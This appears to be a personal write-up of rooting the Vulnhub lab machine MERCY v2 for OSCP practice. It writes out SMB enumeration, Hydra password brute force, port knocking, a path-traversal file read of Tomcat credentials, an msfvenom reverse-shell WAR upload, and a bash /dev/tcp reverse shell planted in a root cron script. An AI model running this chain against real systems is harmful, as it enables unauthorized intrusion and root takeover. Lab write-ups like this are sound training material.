Vulnhub - DIGITALWORLD.LOCAL: MERCY V2

Introduction

MERCY is a machine dedicated to Offensive Security for the PWK course, and to a great friend of mine who was there to share my sufferance with me. :-)
MERCY is a name-play on some aspects of the PWK course. It is NOT a hint for the box.
Note: Some report a kernel privilege escalation works on this machine. If it does, try harder! There is another vector that you should try!

This box is on the NetSecFocus Admin list of OSCP-like machines. It’s MERCY from vulnhub.

Ports

We have quite a few ports:

1. 22/tcp filtered ssh
2. 53/tcp open domain
3. 80/tcp filtered http
4. 110/tcp open pop3
5. 139/tcp open netbios-ssn
6. 143/tcp open imap
7. 445/tcp open microsoft-ds
8. 993/tcp open imaps
9. 995/tcp open pop3s
10. 8080/tcp open http-proxy

So; SSH (filtered), DNS, HTTP (filtered), mail with SSL, SMB and another HTTP port. Whew!

8080

Port 8080 is running Apache Tomcat 7, but it’s just the front page - we have no creds. There is a robots.txt pointing to:

http://192.168.1.169:8080/tryharder/tryharder

Here we find some base64 encoded text that decodes to a message warning about weak passwords, and specifically mentioning “password”.

We’ll come back to Tomcat later.

SMB

I didn’t do this whole thing without hints. Maybe 50% of it. I’ve been taking the attitude if I’m not getting anywhere after some time then get a hint; hopefully it will produce some learning rather than making me lazy. I’m not doing this for imaginary internet points.

Anyway; SMB. I could see the shares with smbclient and smbmap:

root@kali:/opt/vulnhub/mercy# smbclient -L //192.168.1.169
smbclient -L //192.168.1.169
Enter WORKGROUP\roots password: 

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        qiu             Disk      
        IPC$            IPC       IPC Service (MERCY server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
root@kali:/opt/vulnhub/mercy# smbmap -u '' -H 192.168.1.169
smbmap -u '' -H 192.168.1.169
[+] Guest session       IP: 192.168.1.169:445   Name: 192.168.1.169                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        qiu                                                     NO ACCESS
        IPC$                                                    NO ACCESS       IPC Service (MERCY server (Samba, Ubuntu))
root@kali:/opt/vulnhub/mercy#

But I couldn’t log in without any creds. While I had used it before, I didn’t think to try enum4linux. But that’s what we need to do:

root@kali:/opt/vulnhub/mercy# enum4linux 192.168.1.169

With that, we get some users:

S-1-22-1-1000 Unix User\pleadformercy (Local User)
S-1-22-1-1001 Unix User\qiu (Local User)
S-1-22-1-1002 Unix User\thisisasuperduperlonguser (Local User)
S-1-22-1-1003 Unix User\fluffy (Local User)

SMB, logged in

I tried running my users against POP, SMB and the http basic authentication on Tomcat with Hydra but wasn’t getting anywhere. I checked a hint and the SMB password for user qiu was literally password; this should have broken almost immediately. And in fact this does work with other wordlists:

root@kali:/opt/vulnhub/mercy# hydra -L users -P /usr/share/seclists/Passwords/probable-v2-top207.txt smb://192.168.1.169
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-21 06:24:35
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 621 login tries (l:3/p:207), ~621 tries per task
[DATA] attacking smb://192.168.1.169:445/
[445][smb] host: 192.168.1.169   login: qiu   password: password
1 of 1 target successfully completed, 1 valid password found

I have no idea why it didn’t work with rockyou.

Anyway; we find a config file, partially reproduced here:

root@kali:/opt/vulnhub/mercy/opensesame# cat config
Here are settings for your perusal.

Port Knocking Daemon Configuration

[options]
        UseSyslog

[openHTTP]
        sequence    = 159,27391,4
        seq_timeout = 100
        command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
        tcpflags    = syn

So we have port knocking enabled, and now we know the sequence.

Knock knock

I didn’t have knock installed on this box, so I installed it, ran it and then ran nmap again to see if we had an open HTTP port - success!

root@kali:/opt/vulnhub/mercy# apt install knockd
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  knockd
0 upgraded, 1 newly installed, 0 to remove and 142 not upgraded.
Need to get 25.8 kB of archives.
After this operation, 104 kB of additional disk space will be used.
Get:1 http://kali.download/kali kali-rolling/main amd64 knockd amd64 0.7-1+b1 [25.8 kB]
Fetched 25.8 kB in 3s (8,248 B/s)
Selecting previously unselected package knockd.
(Reading database ... 292737 files and directories currently installed.)
Preparing to unpack .../knockd_0.7-1+b1_amd64.deb ...
Unpacking knockd (0.7-1+b1) ...
Setting up knockd (0.7-1+b1) ...
update-rc.d: We have no instructions for the knockd init script.
update-rc.d: It looks like a network service, we disable it.
Processing triggers for man-db (2.9.3-2) ...
Processing triggers for kali-menu (2021.1.1) ...
root@kali:/opt/vulnhub/mercy# knock 192.168.1.169 159 27391 4 -d 100
root@kali:/opt/vulnhub/mercy# nmap 192.168.1.169
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 04:01 EST
Nmap scan report for 192.168.1.169
Host is up (0.0036s latency).
Not shown: 990 closed ports
PORT     STATE    SERVICE
22/tcp   filtered ssh
53/tcp   open     domain
80/tcp   open     http
*SNIP*

HTTP

On the website we can find robots.txt which shows us /mercy and /nomercy. At /nomercy with find an install of RIPS 0.53, which searchsploit tells us has Multiple Local File Inclusions.

It didn’t take me long to figure out this was the way to find out Tomcat credentials:

http://192.168.1.169/nomercy/windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml

This was quite similar to Tabby from HTB.

<role rolename="admin-gui"/>
<role rolename="manager-gui"/>
<user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
<user username="fluffy" password="freakishfluffybunny" roles="none"/>

So then we could login to Tomcat as thisisasuperduperlonguser.

Tomcat

With the Tomcat GUI we could upload a WAR file:

root@kali:/opt/vulnhub/mercy# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.150 LPORT=1234 -f war > shell.war

And then we had a shell.

Fluffy

Since we already had a password for Fluffy, we should try it:

uid=116(tomcat7) gid=126(tomcat7) groups=126(tomcat7)
python -c 'import pty;pty.spawn("/bin/bash");'
tomcat7@MERCY:/var/lib/tomcat7$ su fluffy
su fluffy
Password: freakishfluffybunny

$ python -c 'import pty;pty.spawn("/bin/bash");'
python -c 'import pty;pty.spawn("/bin/bash");'
fluffy@MERCY:/var/lib/tomcat7$ cd /home/fluffy

Once we’re there we find a script which is running on a cron as root; that’s not obvious. What is (or should be) obvious is that we can edit it:

fluffy@MERCY:~/.private/secrets$ ls -lash
ls -lash
total 20K
4.0K drwxr-xr-x 2 fluffy fluffy 4.0K Nov 20  2018 .
4.0K drwxr-xr-x 3 fluffy fluffy 4.0K Nov 20  2018 ..
4.0K -rwxr-xr-x 1 fluffy fluffy   37 Nov 20  2018 backup.save
4.0K -rw-r--r-- 1 fluffy fluffy   12 Nov 20  2018 .secrets
4.0K -rwxrwxrwx 1 root   root    222 Nov 20  2018 timeclock

fluffy@MERCY:~/.private/secrets$ printf 'bash -i >& /dev/tcp/192.168.1.150/1235 0>&1\n' >> timeclock

Now it’s wait for a shell:

root@kali:/opt/vulnhub/mercy# nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.1.150] from (UNKNOWN) [192.168.1.169] 51992
bash: cannot set terminal process group (24445): Inappropriate ioctl for device
bash: no job control in this shell
root@MERCY:~# ls -lash
ls -lash
total 56K
4.0K drwx------  3 root root 4.0K Sep  1  2018 .
4.0K drwxr-xr-x 21 root root 4.0K Aug 27  2018 ..
4.0K drwx------  2 root root 4.0K Aug 24  2018 .aptitude
4.0K ----------  1 root root 1.3K Sep  1  2018 author-secret.txt
4.0K -rw-------  1 root root  204 Nov 20  2018 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Feb 20  2014 .bashrc
 20K -rw-r--r--  1 qiu  qiu   18K Dec 21 18:55 config
4.0K -rw-r--r--  1 root root  140 Feb 20  2014 .profile
4.0K ----------  1 root root   38 Aug 25  2018 proof.txt
4.0K -rw-r--r--  1 root root   66 Aug 26  2018 .selected_editor
root@MERCY:~# cat pro
cat proof.txt 
Congratulations on rooting MERCY. :-)

BOOM.

Epilogue

Learnings:

1. If SMB, run enum4linux
2. Use a short password list first, don’t go straight to rockyou
3. Look at file permissions closely